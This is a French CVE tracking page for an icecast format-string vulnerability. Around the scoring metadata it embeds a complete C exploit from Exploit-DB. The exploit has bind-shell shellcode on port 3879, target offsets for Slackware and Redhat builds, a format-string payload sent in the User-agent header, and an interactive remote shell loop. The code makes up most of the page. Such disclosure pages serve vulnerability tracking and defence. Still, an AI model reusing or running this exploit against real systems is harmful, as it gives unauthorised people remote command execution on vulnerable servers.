Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Format string vulnerability in print_client in icecast 1.3.8beta2 and earlier allows remote attackers to execute arbitrary commands.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 20582
Date de publication : 2001-01-20 23h00 +00:00
Auteur : CyRaX
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/2264/info
Versions of icecast up to and including 1.3.8 beta2 exhibit a format string vulnerability in the print_client()function of utility.c. A malicious user can cause the *printf function to overwrite memory at possibly arbitrary addresses.
* Exploits format string vulnerability in icecast 1.3.7
* Coded by |CyRaX| <[email protected]>
* Packet Knights Crew http://www.pkcrew.org/
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <netinet/in.h>
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
unsigned long ip;
void try_it();
struct target{
char *name;
char *addr1;
char *addr2;
char *addr3;
char *addr4;
u_short one;
u_short two;
u_short three;
u_short xx;
u_short pad;
};
int main(int argc,char **argv){
int s,i,sel;
struct sockaddr_in sk;
char sndbuff[9000],xx[9000],one[300],two[300],three[300],nop[1000],pad[100];
struct target tl[]={
{
"icecast-1.3.7.tar.gz compiled on Slackware 7.0",
"\x1c\xdb\x5f\xbf",
"\x1d\xdb\x5f\xbf",
"\x1e\xdb\x5f\xbf",
"\x1f\xdb\x5f\xbf",
123,
136,
96,
2076,
5
},
{
"icecast-1.3.7.tar.gz compiled on Redhat 7.0",
"\xd8\xd8\x5f\xbf",
"\xd9\xd8\x5f\xbf",
"\xda\xd8\x5f\xbf",
"\xdb\xd8\x5f\xbf",
116,
159,
96,
2074,
3
}
};
printf("Icecast 1.3.7 format bug exploit by |CyRaX| <[email protected]\n");
printf("Packet Knights Crew | http://www.pkcrew.org/\n");
if(argc<4){
printf("Usage : ./PKCicecast-ex <target> <port> <type>\n");
printf("types are :\n");
for(i=0;i<(sizeof(tl)/sizeof(struct target));i++){
printf("%2i : %s\n",i,tl[i].name);
}
exit(0);
}
sel=atoi(argv[3]);
memset(sndbuff,0,9000);
memset(xx,0,9000);
memset(one,0,300);
memset(two,0,300);
memset(three,0,300);
memset(pad,0,100);
memset(nop,'\x90',1000);
nop[1000]=0;
s=socket(AF_INET,SOCK_STREAM,0);
ip=inet_addr(argv[1]);
sk.sin_addr.s_addr=ip;
sk.sin_port=htons(atoi(argv[2]));
sk.sin_family=AF_INET;
connect(s,(struct sockaddr *)&sk,sizeof(sk));
strcpy(sndbuff,"GET / HTTP/1.0\n");
send(s,sndbuff,strlen(sndbuff),0);
for(i=0;i<=(tl[sel].xx*3);i+=3){
memcpy(xx+i,"%8x",3);
}
memset(one,'\x90',tl[sel].one);
memset(two,'\x90',tl[sel].two);
memset(three,'\x90',tl[sel].three);
memcpy(one+strlen(one)-2,"\xeb\x02",2);
memcpy(two+strlen(two)-2,"\xeb\x02",2);
memcpy(three+strlen(three)-2,"\xeb\x02",2);
memset(pad,'X',tl[sel].pad);
sprintf(sndbuff,"User-agent: %s"
"%s"
"%s"
"%s"
"%s"
"%s" /* the %8x */
"%%n"
"%s%%n"
"%s%%n"
"%s%%n"
"%s"
"%s\n\n"
,pad,tl[sel].addr1,tl[sel].addr2,tl[sel].addr3,tl[sel].addr4,
xx,one,two,three,nop,code);
send(s,sndbuff,strlen(sndbuff),0);
printf("We must sleep for 120 seconds. Waiting for icecast to do the statistic\n");
alarm(120);
signal(SIGALRM,try_it);
while(1)recv(s,sndbuff,9000,0);
}
void try_it(){
struct sockaddr_in sk;
int s;
char buff[1000];
fd_set fs;
printf("trying!\n");
sk.sin_addr.s_addr=ip;
sk.sin_port=htons(3879);
sk.sin_family=AF_INET;
s=socket(AF_INET,SOCK_STREAM,0);
if(connect(s,(struct sock_addr*)&sk,sizeof(sk))==-1){
printf("sorry.. it did'nt worked\n");
exit(0);
}
strcpy(buff,"uname -a;id\n");
send(s,buff,strlen(buff),0);
while(1){
memset(buff,0,1000);
FD_ZERO(&fs);
FD_SET(0,&fs);
FD_SET(s,&fs);
select(s+1,&fs,NULL,NULL,NULL);
if(FD_ISSET(0,&fs)){
fgets(buff,1000,stdin);
send(s,buff,strlen(buff),0);
}
if(FD_ISSET(s,&fs)){
recv(s,buff,1000,0);
printf("%s",buff);
}
}
}
Products Mentioned
Configuraton 0
Icecast>>Icecast >> Version To (including) 1.3.8_beta2
Icecast>>Icecast >> Version 1.3.7
Configuraton 0
Redhat>>Linux >> Version 6.0
- Redhat>>Linux >> Version 6.0 (Open CPE detail)
Redhat>>Linux >> Version 6.1
- Redhat>>Linux >> Version 6.1 (Open CPE detail)
Redhat>>Linux >> Version 6.2
- Redhat>>Linux >> Version 6.2 (Open CPE detail)
Redhat>>Linux >> Version 7.0
- Redhat>>Linux >> Version 7.0 (Open CPE detail)
Références
http://archives.neohapsis.com/archives/bugtraq/2001-01/0348.html
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000374
Tags : vendor-advisory, x_refsource_CONECTIVA
Tags : vendor-advisory, x_refsource_CONECTIVA
2025©
tesweb SA
